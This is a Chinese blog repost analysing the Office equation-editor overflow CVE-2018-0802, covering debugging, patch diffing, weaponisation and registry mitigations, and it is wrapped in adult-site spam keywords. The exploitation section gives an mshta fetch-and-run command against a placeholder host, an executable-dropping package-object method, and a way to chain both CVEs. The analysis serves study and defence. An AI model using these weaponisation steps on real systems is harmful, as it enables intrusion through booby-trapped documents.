日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > c/c++ >内容正文

c/c++

c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析

發布時間:2025/3/15 c/c++ 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

本文作者:ghostkeeper(信安之路首次投稿作者)

獲得獎勵:加入信安之路核心群+免費邀請加入信安之路知識星球+免費獲取 90sec 論壇邀請碼

在 2017 年 11 月,微軟發布的 11 月更新布丁中,微軟將隱藏許久的 office 遠程代碼執行漏洞 (CVE-2017-11882)給修復了,由于該漏洞為一個標準的的棧溢出漏洞,原理與復現都較為簡單,且影響從?Office 2000-Office 2016?幾乎所有的戶 Office 版本,所以吸引了當時很多人的關注。不過,雖然微軟發布了該漏洞的修復補丁,但卻是以二進制補丁的形式發布的,并沒有以源碼的形式重新進行編譯, 因而并沒有從源碼的層面上徹底排除該漏洞, 且修復后也沒有開啟 DEP,僅僅增加了 ASLR,這就為我們對該類漏洞的二次開發利用提供了可能,而 CVE-2018-0802 也就是在該背景下被人發現的

0x01.調試環境及準備工作

注:要分析該漏洞,必須在已經打過 CVE-2017-11882 微軟補丁(補丁號 kb4011604) 的 Word 軟件中進行(具體原因后面會說),而微軟官方補丁更新中最低支持 Office 2007 sp3,所以正確的順序為先安裝 Office 2007,再安裝 Office 2007 sp3 升級包,最后安裝 kb4011604 更新補丁

安裝好環境后,雙擊打開從網上獲取的 POC 文件,地址:

https://github.com/GeekOnlineCode/POC/tree/master/CVE-2018-0802

如果能彈出計算器,那么環境安裝成功,接下來就可以進行愉快的調試環節了

0x02.動態調試

在虛擬機里雙擊打開 POC 發現彈出計算器,我們首先想到的是該 POC 可能調用了 CreateProcess() 函數,所以打開 Word,用 OD 附加后給 CreateProcess() 函數下 API 斷點,運行后再次打開 POC 發現計算器正常彈出,斷點并沒有斷下

說明該 POC 并不是針對 Word 程序的,那究竟是誰調用了計算器呢?這里我們可以使用 Process Monitor 這個工具,打開 Process Monitor,雙擊 POC 后,打開 Process Monitor 的進程樹,可以發現是 EQNEDT32.EXE 這個程序調用了 cmd 彈出了計算器

在這里我們可以發現,Word 的公式編輯器是作為一個獨立的 .exe 文件存在的,并不是 .dll 之類的動態鏈接庫,所以直接對 Word 下斷點是沒有用的。同時,也可以在上圖的進程樹窗口里找到 Word 的公式編輯器的文件路徑(C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE),把它復制一份出來,雙擊啟動后再用 OD 附加并設置 API 斷點,運行后再打開 POC 文件,發現程序成功地斷在 CreateProcess() 處,不過觀察堆棧窗口后可以發現,調用并不是來自 EQNEDT32.EXE,而是來自 Kernel32.dll

也就是說,漏洞觸發后,并沒有直接調用 CreateProcess() 這個函數,因此,打開 OD 的堆棧調用窗口,可以發現,漏洞觸發后,應該是直接調用的 Winexec() 這個函數

給 Winexec() 這個函數下斷點后,關閉 Word,重新打開公式編輯器并用 OD 進行附加,然后打開 POC,發現程序斷在了 Winexec() 處。不過,我們發現,隨著每次對公式編輯器重新進行附加調試,調用 Winexec() 函數的調用地址在不斷變化,并不固定,為了方便后續對函數的分析與定位,我們可以暫時關掉該公式編輯器的 ASLR,等到分析完畢再重新把它打開,關閉方法是找到 PE 文件的 PE 頭中擴展頭的 DLL 屬性并將其前一個字節清零即可,即把 IMAGE_NT_HEADERS->IMAGE_OPTIONAL_HEADER->DllCharacteristics 字段的前一個字節清零,利用 010 Edit 的模板功能,可以很方便地完成

關閉 ASLR 之后,調用地址終于不再變化。接下來我們看 Winexec() 函數調用處附近的堆棧,熟悉 Windows 函數棧幀與調用約定以及有過棧溢出漏洞分析經驗的童鞋可能知道,在 Windows 中,棧的生長方向是由高地址向低地址處生長,也就是說,先被調用的函數其棧幀在堆棧區的高地址處,而后被調用的函數其棧幀在堆棧區的低地址,而當一個函數內的局部變量緩沖區發生溢出時,則是由低地址向高地址處淹沒的,也就是說,當發生棧溢出時,只有可能把本函數或者調用本函數的上層函數返回地址給淹沒,而本函數調用的函數(其中可能就包括了發生溢出的函數)以及它們內部繼續調用的下層函數其棧幀應該是是沒有被破壞的

因此,我們可以在 Winexec() 函數被調用處的堆棧區域向上搜索那些堆棧區域沒有被破壞的函數調用,并通過它們的返回地址找到調用它們的函數的地址并給它下斷點,然后重新用 OD 附加公式編輯器并打開 POC 進行調試,調試時注意觀察堆棧區域變化,當被斷下的函數執行到某一個函數或是字符串賦值指令時,堆棧區域出現明顯的變化且有函數返回地址被破壞時,該函數或是匯編指令即為我們需要找的溢出函數,被破壞的返回地址即為溢出點。順著這個思路,我們可以在堆棧區 12f100 處向上搜索那些返回地址來自 EQNEDT32.EXE 的函數棧幀,并找到調用它們的函數然后下斷點

不過,經過一系列的嘗試后,我們發現,12f100 向上的堆棧區域,似乎并沒有能夠改寫一片連續的緩沖區并將某函數返回地址破壞的函數出現,這該怎么辦?難道我們之前的分析有問題么?碰到這種情況,我們要積極地轉換思路,同時對 OD 的代碼窗口,數據窗口,堆棧窗口以及寄存器窗口多留意觀察,不要在一棵樹上吊死。如果細心觀察 OD 的堆棧窗口和寄存器窗口,我們可以發現,call Winexec() 這條匯編指令的地址是 430c12,而此時 eax 里存放的值剛好也是 430c12

于是我們可以大膽猜測,應該是一個 jmp eax 或者是一個 call eax 的匯編指令讓程序的 eip 轉到了 430c12 處,在沒有開啟 DEP 的情況下,這條匯編指令,最有可能出現在程序的堆棧區域,所以我們可以在堆棧區里搜索這 2 條指令,不過在 OD 里我們是無法在堆棧窗口直接搜索匯編指令,所以需要搜索這兩條指令的機器碼 FF E0(jmp eax) 和 FF D0(call eax),經過搜索,只有 12f379 處出現了 jmp eax,在代碼窗口跟隨該地址,并觀察附近的匯編指令,我們還可以發現,函數的第一個參數保存在了 ebx 中,而此時 ebx 保存的也剛好是彈出計算器的 cmd 命令,由此,我們基本可以確定,12f379 附近應該就是我們需要找的 Shellcode

在 12f379 處下硬件訪問斷點和硬件寫入斷點,然后結束進程再用 OD 重新進行附加調試,發現程序依然斷在了 430c12 處,這是因為被附加調試的程序在第一次只會被軟件斷點所斷下,而這之后再遇到硬件斷點或者內存斷點的話才有可能被斷下,因此,我們需要在該硬件斷點被觸發前先設置一個軟件斷點,結合前面所說的 Windows 中堆棧的生長方向,我們在 OD 的堆棧窗口中順著 12f379 的地址向下尋找,可以找到一個返回地址來自 ole32.dll 的函數調用,給該函數返回地址下斷點,然后再次用 OD 進行附加調試

當程序成功斷下后,我們可以暫時先關閉該軟件斷點,然后按 F9 正常運行,之前設置的硬件斷點便可以正常斷下了。第一處斷下的地址,經分析并沒有什么特別的地方,接著再 F9 繼續運行,也沒什么特別的地方,直到第三次被斷下,發現是一個串賦值指令,源字符串地址就是我們設置硬件斷點地址后的的 12f37c,而目的字符串地址則停在了 12f29c,同時觀察 12f379 與 12f299 處內存數據,也可以發現有 jmp eax 的機器碼出現,熟悉匯編語言的童鞋,馬上就會想到此處匯編指令對應的 C 代碼應該是一個 strcpy() 的字符串拷貝函數,而 12f29c 附近應該就是被淹沒的緩沖區,不過,觀察后可以發現,該函數的棧幀棧底為 12f208,而被淹沒的緩沖區則在 12f29c 附近,所以猜測被溢出的緩沖區應該不屬于該函數,而是調用該函數的上一層函數

接下來找到該函數起始地址 421e39 并設置斷點,然后一路單步下去,在這個函數執行結束返回上一層函數的棧幀空間時,我們可以發現調用 421e39 函數的這個函數,它的棧幀棧底為 12f300,距離之前被淹沒的緩沖區非常接近,對 OD 堆棧窗口進行觀察可以發現該函數棧幀空間其 ebp 以及 ebp 向上的空間部分都出現了大量 0x20202020 數據,而不考慮開啟了 ASLR,一個正常運行的程序它的函數的棧底是不會有 20202020 這個地址出現的,所以這個函數的堆棧空間遭到了破壞,之前被淹沒的緩沖區,覆蓋的應該就是它的返回地址

至此,該漏洞的溢出函數以及溢出點已經被我們所找到,接下來就是驗證我們的猜想。找到溢出點所在函數的起始地址 421774 并設置好斷點,然后結束進程并重新用 OD 進行附加調試,程序成功地斷在了 421774 函數這里,注意觀察這里的堆棧空間,是從 12f228 到 12f300

然后一路快速步過,直至運行到 421e39 函數這里,單步步入,這里首先求出了存放在 esi 寄存器中源字符串的長度為 0x96

接著將源字符串中前 0x94 字節賦值給 421774 函數開辟的緩沖區里,這里我們發現,該緩沖區起始地址為 12f270,賦值 0x94 個字節后剛好賦值到了 12f303 這個地址,而之前我們提到過,12f300 到 12f303 這四個字節剛好存放的是 421774 函數的棧底

然后,又將源字符串的最后兩個字節繼續賦值給緩沖區,由于之前賦值操作已經覆蓋到了 421774 函數的棧底,所以接下來的兩個字節理所當然的覆蓋到了 421774 函數返回上一層函數調用的返回地址,不過由于只有兩個字節,所以實際是覆蓋了返回地址的低兩字節

接下來就是正常一路單步過去,直到 421e39 函數執行完返回 421774 函數的調用處,繼續一路單步,可以發現在 421774 函數內部還有一處遞歸調用,調用 421774 函數自己,不過一路跟過去后發現并沒有什么大問題,遞歸調用后的 421774 函數在調用 421e39 函數時僅僅只是普通的給字體名稱賦值,同時在發生過一次遞歸之后也不會發生第二次遞歸,最后執行完后再次返回第一次調用 421774 函數的地方,一路快速單步步過,來到函數的 ret 指令處,通過上面的分析,我們已經知道此時的函數返回地址已經被修改

繼續單步,發現又來到了一處ret指令,繼續跳轉,發現剛好跳轉到了我們給 421774 函數的緩沖區賦值的源字符串的起始地址 12f350

等到跳回這里,就是我們 Shellcode 執行的起始地址了,這里的 Shellcode 也不復雜,主要就是根據 PEB 獲得鏡像加載基址,并根據固定偏移獲得 call Winexec() 匯編代碼的地址,利用 call pop 等指令獲得當前棧空間地址,并利用固定偏移找到 Shellcode 中彈出計算器 cmd 命令的字符串地址,最后傳參調用函數,彈出計算器。具體分析如下

通過以上分析,我們發現,該 Shellcode 在執行時,有將棧幀故意抬高 0x200 字節的行為,這也就是我們在一開始分析該漏洞時,無法根據堆棧分布特點,準確定位到溢出函數與溢出點的原因。同時,由于原程序開啟了 ASLR,所以在覆蓋返回地址時,僅僅覆蓋了低兩字節的相對于基址的偏移量,而高兩字節的加載基址,對于已經運行起來的程序來說,任何函數的加載基址都是一樣的,所以我們直接"借用"即可。而在 Shellcode 中的 call pop 指令組合獲取當前堆棧地址以及利用 PEB 獲取鏡像的加載基址等操作,也避免了開啟 ASLR 所帶來的影響

至此,該漏洞的動態調試結束

0x03.靜態分析

在對該漏洞動態調試完成后,為了進一步了解漏洞的成因,我們還可以用 IDA 對其進一步的靜態分析。用 IDA 打開 EQNEDT32.EXE 文件,由于之前我們在用 OD 進行動態調試的時候,已經把該程序的 ASLR 關閉了,所以程序運行時使用的加載基址則是默認加載基址,這與 IDA 中顯示的地址是一致的。我們直接來到發生溢出的函數 421e39 這里,可以很明顯的看到,在進行字符串賦值操作的時候,并沒有對長度進行檢查,這也是造成這個漏洞主要原因

來到 421774 函數這里,我們可以看到該函數調用 421e39 函數的地方,同時,觀察后也可以發現,在 421774 函數內開辟被淹沒的緩沖區,原本長度可能只有 0x3c 個字節,被賦值時,是從第 28 位,也就是 0x1c 開始覆蓋的,所以實際被覆蓋的合法區域長度只有 0x20 個字節,而在被覆蓋了 0x94 個字節之后,0xac-0x1c-0x94=-0x04,也就是 ebp+3 的位置,剛好覆蓋掉 ebp,之后 2 個字節接著覆蓋掉返回地址低 2 字節,這也與我們之前的分析一致

結合在網上的其它資料,我們可以知道該漏洞是因為 EQNEDT32.EXE 中的“Equation Native”流中出現了問題,大致了解一下它的結構,整個”EquationNative”數據由頭結構和后續數據組成。其頭結構為:

struct?EQNOLEFILEHDR?{????WORD????cbHdr;????//?EQNOLEFILEHDR長度,恒為0x1c????DWORD???version;??//?恒為0x20000????WORD????cf;???????//?剪切板格式("MathType?EF")????DWORD???cbObject;?//?MTEF數據長度,不包括EQNOLEFILEHDR部分????DWROD???reserved1;//?未公開????DWORD???reserved2;//?未公開????DWORD???reserved3;//?未公開????DWORD???reserved4;//?未公開};

而緊接著頭結構內容的是 MTEFData 內容,MTEFData 內容也由 MTEF 頭和 MTEF 字節流數據組成,MTEF 頭內容:

struct?MTEF_HEADER?{????BYTE?bMtefVersion;???????//?MTEF版本號,一般為0x03????BYTE?bPlatform;??????????//?系統生成平臺,0x00為Mac生成,0x01為Windows生成????BYTE?bProduct;???????????//?軟件生成平臺,0x00為MathType生成,0x01為公式編輯器生成????BYTE?bProductVersion;????//?產品主版本號????BYTE?bProductSebVersion;?//?產品副版本號};

MTEF 字節流數據包括一系列的記錄,每一個記錄以一個標簽位開始,標簽位的低4位描述該記錄的類型,高四位描述該記錄的屬性,后續緊跟標簽的內容數據,本次漏洞則主要發生在字體標簽部分,因而主要對字體標簽進行了解:

struct?stuFontRecord?{????BYTE????bTag;????????//?字體文件的tag位0x08????BYTE????bTypeFace;???//?字體風格????BYTE????bStyle;??????//?字體樣式????BYTE????bFontName[n]?//?字體名稱,以NULL為結束符};

其中的 bFontName[n],即字體名稱,在賦值時對它的判斷是以 NULL 為結束標記的,而沒有對長度進行效驗,所以造成此次漏洞

關于 MTEF 的其它詳細介紹,有興趣童鞋可以參考:

http://rtf2latex2e.sourceforge.net/docs.html

此處不再過多介紹

至此,該漏洞的靜態分析結束

0x04 與 CVE-2017-11882 比較

由于該漏洞是在 CVE-2017-11882 打完補丁后被發現了,作為它的"難兄難弟",我們自然關心它與 CVE-2017-11882 有什么聯系。我們首先將此時的虛擬機快照保存,接著退回到 Office 2007 安裝前的狀態重新安裝 Office 2007,安裝完后,不要打任何補丁,直接來到之前提取公式編輯器的文件路徑重新復制一份并重命名為 EQNEDT32_OLD.EXE,然后再回到之前的快照當中用 IDA 插件 BinDiff 進行比較,關于 BinDiff 的安裝與用法,可以參考

https://www.cnblogs.com/lsdb/p/10543411.html

在此不再過多敘述

通過對比,我們發現,打完補丁前后共有 5 個函數發生了改變,如果之前有分析過 CVE-2017-11882 那個漏洞的童鞋可能知道,觸發那個漏洞的溢出函數與被淹沒的緩沖區都在 401160F 函數里,這里我們關注這個函數

用 BinDiff 打開觀察后發現,與補丁前相比,補丁后多了 8 個基本塊,除此外也有部分基本塊內的指令與原先不一樣。這里我們來到對函數緩沖區進行賦值的地方,也就是函數開始處

可以發現,打完補丁后,在函數起始的地方多出了兩個基本快,主要作用是在進行字符串賦值前,首先求一下該字符串長度并存在 ecx 中,如果大于等于 0x21,則會將 ecx 即字符串賦值長度固定為 0x20,隨后再進行賦值操作,在 IDA 中能更明顯地看出來

補丁前的 41160f 函數:

補丁后的 41160f 函數:

到這里,可能有的童鞋會想,打完 kb4011604 補丁后,CVE-2017-11882 無法被觸發,而 CVE-2018-0802 可以,那如果我們在未打補丁的情況下運行 CVE-2018-0802 POC 也能成功彈出計算器的話,那這個 POC 豈不是可以"無視"微軟的這個更新補丁顯得很"通用"?我一開始也是這么想的,不過當我們在未打補丁的情況下運行 CVE-2018-0802 的 POC 時,它并沒有成功,這又是為什么呢?為了找到原因,我們還是先用 OD 附加上公式編輯器并在 421774 和 421e39 這兩個函數下斷點,由于補丁前并沒有開啟 ASLR,所以直接搜索地址即可,然后打開 POC 文件,發現程序成功在 421774 函數這里斷下,接著一路單步過去直至來到 421e39 函數這里,單步進去,然后繼續一路單步過去

可以發現這里緩沖區依然可以被成功淹沒過去,接著繼續一路單步下去,走完 421e39 函數,沒有問題,回到 421774 函數這里,繼續一路單步步過,直至步過 4115a7 函數時,程序發生了異常

非法讀取 2f204558 這個地址上的數據,接下來,我們給 4115a7 函數下斷點,重新附加調試,進入 4115a7 函數內,一路單步過去,發現是函數內調用 41160f 函數這里發生了異常,給 41160f 函數下斷點,繼續重新附加調試,然后在 41160f 函數內一路單步過去,直到在第一次調用 44c430 函數時觸發異常,然后繼續重新附加調試并在 44c430 函數內一路單步下去,最終,函數在執行到 MOV DL,BYTE PTR DS:[ECX] 這條指令時觸發了異常

此時的 ecx 值已經為 2f204558,向上回溯,發現 ecx 的值來自 [esp+0x8],重新附加調試來到 44c430 這里,發現此時 [esp+0x8] 的數據也還是 2f204558,繼續向上回溯

觀察可以發現 [esp+0x8] 的值來自于調用 44c430 函數的函數,即 41160f 函數的第一個參數,我們再繼續重新進行附加調試來到 41160f 函數入口這里

可以發現,此時 41160f 函數的第一個參數是 12f350,并不是 2f204558,不過對于正常的函數調用來說,一個函數它的參數是不可能發生變化的,除非...我們一路單步運行下去,直至執行完?REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]?這條指令

可以發現,執行完這條指令后,此時的函數參數已經變成了 2f206578,繼續單步下去

等到執行完 451de0 這個函數后,函數的參數最終變成了 2f204558。此時細心的童鞋應該已經發現,這個 41160f 函數其實就是補丁前造成 CVE-2017-11882 的"罪魁禍首",而這兩個漏洞用來溢出緩沖區的源字符串的都出自同一個地址 12f350,即上文分析時所提到的 MTEF 字節流數據 中 字體標簽 結構體的 字體名稱 成員變量??bFontName[n]

在 IDA 中,我們可以更加清楚地觀察到這一過程,分析可知在 41160f 函數中,若用來淹沒緩沖區的源字符串長度超過 0x30 時,41160f 函數參數 a1 便會被破壞,而這之后當 44c430 函數,即 strstr() 函數被調用時再將 a1 作為參數傳入函數后就極易發生非法內存訪問異常。而對于 CVE-2018-0802 POC 來說,用來覆蓋緩沖區的源字符串的長度足足有 0x96 個字節,早就超過了 0x30,所以函數也就無法繼續執行下去。而 41160f 函數是被 4115a7 函數所調用,而 4115a7 函數又是被 421774 函數所調用,所以在 421774 函數執行到 ret 指令前,函數就已經發生了異常,用來彈出計算器的 Shellcode 自然也就沒有機會被執行。而在補丁過后,41160f 函數中的緩沖區已經收到了保護,不可能再發生溢出的情況,但與此同時它的參數 a1 也受到了保護,不再有可能被破壞,也就是說像上述分析那樣 41160f 函數在調用 strstr() 函數時發生非法內存訪問異常的情況,在補丁過后是不可能出現的,41160f 函數將會被順利執行完,而這也就為 CVE-2018-0802 漏洞的出現創造了前提條件。

其實換個角度想想,雖然在補丁前 41160f 函數在對緩沖區進行賦值時未能加以限制,但由于之后其子函數被調用時,它的參數也會被作為其子函數的參數而一并傳入進去,所以為了防止類似上述情況的"意外狀況"發生,對緩沖區的溢出應"點到為止",即只能覆蓋掉函數的返回地址而不能破壞它的傳參,這也就嚴格"限制"了用來淹沒緩沖區的源字符串長度最多只能是 0x30,而對于一個需要 0x96 字節長度字符串來淹沒緩沖區的 CVE-2018-0802 來說,這是不可能的。所以某種角度來說,正是由于補丁前對 41160f 函數緩沖區沒有進行保護,間接"保護"了 421774 函數的緩沖區不可能被溢出破壞 :)

0x05.漏洞利用

通過上述的調試與分析,相信大家已經對 CVE-2018-0802 的形成原因與觸發原理有了一定基本的認識,接下來就是如何進行利用的問題了。通過在網上查閱相關的技術資料以及之前被曝光過部分APT組織所使用的攻擊樣本,主要的利用方式有以下兩種。

第一,將原 POC 文件中的 "cmd.exe /c calc.exe" 替換為 "mshta?http://abc.com/test.txt",這里的 .txt 文件名及其下載地址部分都是可以隨意改動的,我們只需要把我們要執行的 payload 部分寫入 test.txt 文件然后上傳服務器即可。mshta.exe 英文全稱 Microsoft HTML Application, 主要是微軟設計用來執行 .hta 文件的。上述命令執行后,會創建一個 mshta.exe 進程,然后從?http://abc.com/test.txt?下載指定的文件至 IE 本地緩存地址然后去執行。由于這種利用方式要事先準備好一個服務器,比較麻煩,所以我們這里采用第二種更簡單的方式。

第二種方式則是將原 POC 文件中的 "cmd.exe /c calc.exe" 替換為 "cmd /c %temp%/test.exe",然后將我們要執行的 payload 部分編譯成 test.exe 文件并以 package 對象的形式嵌入到 .rtf 文件中。package 對象,即包裝對象,是一種在某個文檔中插入程序包而創建的對象,主要功能為將 PE 文件釋放到系統的臨時目錄文件夾中,對于 rtf 文件格式的文檔而言, 如果用戶打開該文檔,則 WORD 進程會將對象提取到用戶的臨時目錄中, 單擊文檔內的對象, 則會使用默認處理程序啟動它們,在文檔關閉后,WORD 進程會將用戶的臨時目錄中提取的對象進行刪除。而在文檔打開的時間段內,這些被釋放對象可被系統上的其他任何進程所調用。和公式編輯器對象一樣,package 對象也屬于 OLE 對象。OLE 即 Object Linking and Embedding,對象連接與嵌入技術,它一般是用來解決建立復合文檔的問題,在 Office 軟件的應用中一般用來滿足某用戶在一個文檔中加入不同格式數據的需要(如文本、圖像、聲音等)。關于 .rtf 文件,OLE 與 package 這三者的其他介紹,感興趣的童鞋可以在網上參考其他資料,此處便不再過多敘述。這樣,當我們雙擊打開我們準備好的 exp 時,該 exp 會首先將里面 package 對象釋放到系統臨時目錄文件夾下,然后在漏洞觸發后再由上述命令去執行。

下面是構造 exp 具體步驟,我們首先用 vs2015 把我們要執行的 payload 編譯成一個 .exe 文件,這里我們所演示 payload 功能主要為彈窗:

include??int?WINAPI?WinMain(HINSTANCE?hInstance,?HINSTANCE?hPreInstance,?LPSTR?cmdLine,?INT?nShow){????MessageBoxA(0,?"You're?Hacked",?"Warning",?0);?????????return?0; }

接著,我們將我們的 POC 文件復制一份出來,雙擊打開,再依次點擊"插入"、"對象"、"package"、"確定"按鈕,然后把我們準備好的 test.exe 文件以 package 對象的形式插入進去

插入成功后,我們用 010 Edit 打開它,直接搜索 "calc.exe",發現文件中并沒有這樣的字符串,猜測可能是以 ASCII 碼的形式進行了保存,故再次搜索 "63616c63",發現成功搜索到了一處

接著,我們把我們需要修改的命令 "%temp%/test.exe" 先轉化成 16 進制 ASCII 碼,即 "2574656d70252f746573742e657865",再用它覆蓋掉從 "63616c63" 開始的一段與其自身長度相等的一串 16 進制數據,覆蓋時注意不能破壞原來文件的大小,不然可能會導致 Shellcode 沒有對齊被覆蓋的返回地址而導致利用失敗。修改完成后保存退出,雙擊我們修改后的文件,發現并不能像我們預期的那樣彈窗,為了找到原因我們還是像之前分析時的那樣對公式編輯器進行附加調試,但是奇怪的是,當我們對公式編輯器附加調試后,再打開文件時發現 OD 并沒有斷下,也就是說,原 POC 經修改后,公式編輯器對象已經被破壞。上述修改中對 cmd 指令的修改是一個字節一個字節改的,應該不會有什么問題,那問題很有可能出在插入 package 對象的過程中,用 010 Edit 同時打開原 POC 與修改過后的 POC,比較可以發現,相對于原 POC,修改過后的文件多了許多雜七雜八的數據結構

修改前POC文件

修改后的POC文件

可以發現,修改完之后,里面的內容已面目全非,這顯然不是我們想要的結果,因此,我們對于package對象的插入,應該像之前修改cmd指令那樣進行字節級操作,而不能直接依賴 Word 提供給我們的現成的按鈕

結合我們之前對 .rtf 文檔以及 package 對象的了解,我們先用 010 Edit 打開修改過后的文件,搜索 "package" 字符串,搜索到之后,在它的前面不遠處我們可以找到該對象的起始標志 "{\object"

然后從它的起始標志開始一直到它的下一個標簽起始標志前結束,把這段數據復制出來

然后再復制一份 POC 文件出來,把先前拷貝出來的 package 對象粘貼在公式編輯器對象后面(當然前面也是可以的),接著像之前那樣再修改一下 cmd 命令,然后保存并退出,再重新打開修改后的 POC 文件

發現已經可以成功彈窗了,不過卻提示文檔已損壞,猜測可能是之前拷貝 package 對象時拷貝不完全所致,打開 010 Edit 仔細觀察我們拷貝出來的 package 對象,可以發現之前我們拷貝出來的 package 對象,它左邊的大括號有三個,但右邊的大括號只有兩個,也就是說,拷貝出來的 package 對象不完整,我們可以試著在該 package 對象結尾處再加一個右邊大括號,然后保存并退出,接著再一次雙擊打開我們 exp,It Works

到這里,我們根據該漏洞 POC 文件把它改造成一個 EXP 的任務已經完成

通過前面我們將 CVE-2018-0802 與 CVE-2017-11882 的比較可知,這兩個漏洞的觸發條件是互斥的,因此,我們其實可以還可以將 CVE-2017-11882 的 POC 中的公式編輯器對象提取出來插入到我們這個 exp 里,然后將執行 cmd 指令的地方也換成與我們 exp 相同的指令,這樣,無論是否打過 kb4011604 補丁,我們都有機會執行相應的 payload,大大提高了該 exp 通用性。如果有對 rtf 文件格式以及 OLE、PACKAGE 對象比較熟悉的童鞋,還可以用 C++ 或 python 實現一個能一鍵生成 POC 或 EXP 的程序以及腳本,具體過程這里不再詳細討論

0x06.預防及緩解措施

在 CVE-2017-11882 漏洞被曝光后微軟的更新補丁來看,微軟并沒有對該程序的源碼重新進行編譯,加上寫這個軟件的公司被微軟收購后早已不再更新,推測該程序的源碼可能已經遺失,因此微軟將很難從源代碼級別去排查這個程序是否還有其他漏洞,而在這之后對 CVE-2018-080 2更新的補丁中微軟已經徹底放棄 EQEDT32.EXE 文件,從而徹底杜絕了利用該程序進行漏洞攻擊的行為。對于沒有打更新補丁的情況,也可以通過禁用公式編輯器 COM 控件的方式進行緩解,具體操作為同時按下 "Win+R" 鍵打開"運行"窗口,然后輸入 "cmd" 打開 cmd 窗口并輸入以下指令(其中 XX.X 為版本號):

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000- 0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

同時,針對以上使用 mshta 指令與 package 對象進行攻擊的方式,對于前一種我們可以通過修改 mshta.exe 的文件名來阻止命令的實現,具體操作為找到 C:\Windows\System32 目錄下的 mshta.exe 文件,然后重命名為 mshta1.exe 即可,不過由于是在系統文件目錄下進行的修改,如果直接重命名會出現如下錯誤

因而我們還需要獲取該文件的相關操作權限,右鍵單擊屬性,依次選擇"安全"、"高級"

然后依次點擊"所有者"、"編輯"并將當前所有者改為 Administrators,

然后再依次單擊"權限"、"更改權限",

選中 "Administrators" 賬戶,點擊"編輯"

將權限設為完全控制,之后一路點擊"確定"與"應用"按鈕返回,此時我們就可以更改 mshta.exe 的文件名了

修改過后,我們發現 cmd 已經無法識別 mshta 命令了,只能使用我們自己自定義 mshta1 命令進行操作

而對于后一種,我們也可以通過禁用 Package ActiveX 控件來阻止 rtf 文件在臨時目錄釋放文件的問題,具體操作為同時按下 "Win+R" 鍵打開"運行"窗口,然后輸入 "regedit" 打開注冊表編輯器找到以下路徑修改以下數值:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility{F20DA720-C02F-11CE-927B-0800095AE340}]

"Compatibility Flags"=dword:00000400

0x07.結尾

最后,附上本次分析 udd、idb 文件,補丁前后的公式編輯器程序以及 POC 和一個能彈窗的 EXP 文件(請前往星球下載)

總結

以上是生活随笔為你收集整理的c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

成人在线观看资源 | 久草网在线观看 | 日韩大片在线免费观看 | 久久精品国产精品亚洲 | 国产亚洲精品久久久久久久久久 | 亚洲精品国偷拍自产在线观看蜜桃 | 91精品久久久久久久久久入口 | 国产一级91 | 玖玖视频精品 | 久久久久免费电影 | 中文字幕丝袜美腿 | 国产美女免费 | 亚洲午夜久久久久 | 在线免费黄色av | 久久在线电影 | 综合激情久久 | h文在线观看免费 | 天天射综合网视频 | 欧美精品xx | 国产精品3区| 毛片视频电影 | 中文字幕免费国产精品 | 亚洲精品一区二区三区四区高清 | 91丨九色丨首页 | 国产精品欧美一区二区三区不卡 | 国产三级国产精品国产专区50 | 国产亚洲精品久久网站 | 国产精品一区二区三区在线 | 国产高清视频在线免费观看 | 精品国产伦一区二区三区观看说明 | 91精品国产91久久久久 | 免费黄色激情视频 | 91精品在线观看入口 | 久久久国产一区 | 91免费高清视频 | 国产精品久久三 | 亚洲无吗av| 中文字幕在线观看91 | 青青久视频| 这里只有精彩视频 | 日本大尺码专区mv | 久久9999久久免费精品国产 | 人人草人 | 日本午夜免费福利视频 | 国产成人333kkk| 亚洲欧美视屏 | 日韩精品一区二区三区第95 | 成人在线观看影院 | 91系列在线观看 | 中文字幕日韩国产 | 亚洲色视频| 00av视频 | 欧美少妇影院 | 992tv又爽又黄的免费视频 | 中文字幕国产视频 | 欧美精品乱码久久久久 | 欧美精品三级在线观看 | 欧美一级性生活片 | 99夜色| 91自拍视频在线观看 | 国产精品久久久久久久久久久久午夜片 | 丰满少妇对白在线偷拍 | 一区电影| 国产成人精品一二三区 | 亚洲精品日韩一区二区电影 | 久久免费在线 | 久久综合九色综合久久久精品综合 | www色综合| 五月天激情视频 | 精品美女久久久久久免费 | 国产二级视频 | 九九爱免费视频 | 极品久久久久久久 | 精油按摩av | 日本久久中文 | 国产成人黄色av | 欧美9999| 免费aa大片 | 一性一交视频 | 91激情视频在线 | 91精品视频观看 | 国产精品毛片久久 | 久草在线精品观看 | 日韩欧美视频免费在线观看 | 久久在线视频精品 | 国产精品一区在线观看你懂的 | 欧美一区成人 | 日本公妇在线观看 | 成年人免费在线观看网站 | 丁香久久五月 | 成人av免费 | 92精品国产成人观看免费 | 在线观看国产区 | 在线精品视频免费观看 | av电影免费在线播放 | av韩国在线 | 国产精品久久久久久久久久久免费看 | 超碰免费av | 亚洲人xxx | 成人国产精品一区二区 | 成人小视频在线观看免费 | 一本一本久久a久久精品牛牛影视 | 日本黄色片一区二区 | 蜜臀av.com| 国产精品精品 | 免费大片av| 91久久精品一区二区二区 | 亚洲欧美精品一区二区 | 黄网站污| 国产精品久久久久久久久久久久午夜片 | 黄色成年 | 777xxx欧美| 三级黄免费看 | 免费的成人av | 国产精品不卡一区 | 久久精品福利视频 | 国产精品观看在线亚洲人成网 | 日韩网站在线播放 | 欧美一级视频免费看 | 色婷婷视频在线 | 综合久久综合久久 | 91麻豆操 | 国产最新在线观看 | 欧美精品在线免费 | 美女中文字幕 